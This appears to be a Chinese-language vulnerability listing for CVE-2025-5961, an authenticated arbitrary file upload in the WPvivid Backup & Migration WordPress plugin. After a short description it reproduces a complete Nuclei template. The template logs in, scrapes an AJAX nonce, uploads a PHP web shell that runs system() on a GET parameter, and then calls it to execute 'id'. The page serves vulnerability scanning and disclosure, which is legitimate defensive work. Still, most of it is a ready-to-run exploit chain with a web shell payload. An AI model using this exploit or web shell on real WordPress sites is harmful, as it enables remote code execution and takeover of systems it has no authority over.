WordPress WPvivid Backup & Migration Plugin 任意文件上传漏洞

漏洞信息

漏洞名称： WordPress WPvivid Backup & Migration Plugin 任意文件上传漏洞

漏洞编号：

• CVE： CVE-2025-5961

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： WordPress的WPvivid Backup & Migration插件是一个用于网站备份、迁移和暂存的热门插件，广泛应用于需要网站数据管理和迁移的WordPress网站中。该插件提供了一个用户友好的界面，使得网站管理员可以轻松地进行备份和迁移操作。然而，在版本0.9.116及之前的所有版本中，插件存在一个严重的文件上传漏洞。该漏洞源于插件在处理文件上传时，未对上传的文件类型进行充分的验证，特别是在’wpvivid_upload_import_files’函数中。攻击者可以利用这一漏洞，通过认证后上传任意文件，包括恶意的PHP文件，进而可能导致远程代码执行、系统完全被控制以及敏感数据的未授权访问。由于该漏洞需要攻击者具备认证权限，因此攻击者需要首先获取到有效的管理员凭证。一旦攻击成功，攻击者可以完全控制受影响的网站，对网站数据和服务造成严重影响。

产品厂商： WPvivid

产品名称： WPvivid Backup & Migration Plugin

影响版本： <= 0.9.116

来源： https://github.com/projectdiscovery/nuclei-templates/blob/757d3cfbaca1c71d8f0d117be7c7b7e65bd6bda3/http%2Fcves%2F2025%2FCVE-2025-5961.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-5961

info:
  name: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116.
  impact: |
    An authenticated attacker can upload arbitrary files, including PHP files, which can lead to remote code execution, complete system compromise, and unauthorized access to sensitive data.
  remediation: |
    Update the WPvivid Backup & Migration plugin to a version that addresses this vulnerability or remove the plugin if no fix is available.
  reference:
    - https://github.com/Nxploited/CVE-2025-5961
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore/migration-backup-staging-wpvivid-backup-migration-09116-authenticated-administrator-arbitrary-file-upload
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-5961
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 4
    publicwww--query: "/plugins/wpvivid-backuprestore/"
  tags: cve,cve2025,wordpress,,wp-plugin,intrusive,wpvivid-backuprestore,authenticated,file-upload,backup

variables:
  payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
  cmd: 'id'
  filename: "{{rand_text_alpha(12)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2

        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="action"

        wpvivid_upload_import_files
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="_ajax_nonce"

        {{ajax_nonce}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.php"
        Content-Type: application/x-php

        {{payload}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="name"

        {{filename}}.php
        --0b9e4b9be0f532af74af1582b95632f2--

      - |
        GET wp-content/wpvividbackups/ImportandExport/{{filename}}.php?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{"result":"success"}'

      - type: regex
        part: body_4
        regex:
          - 'uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)'

    extractors:
      - type: regex
        part: body_2
        group: 1
        internal: true
        name: ajax_nonce
        regex:
          - '"ajax_nonce":"([a-f0-9]+)"'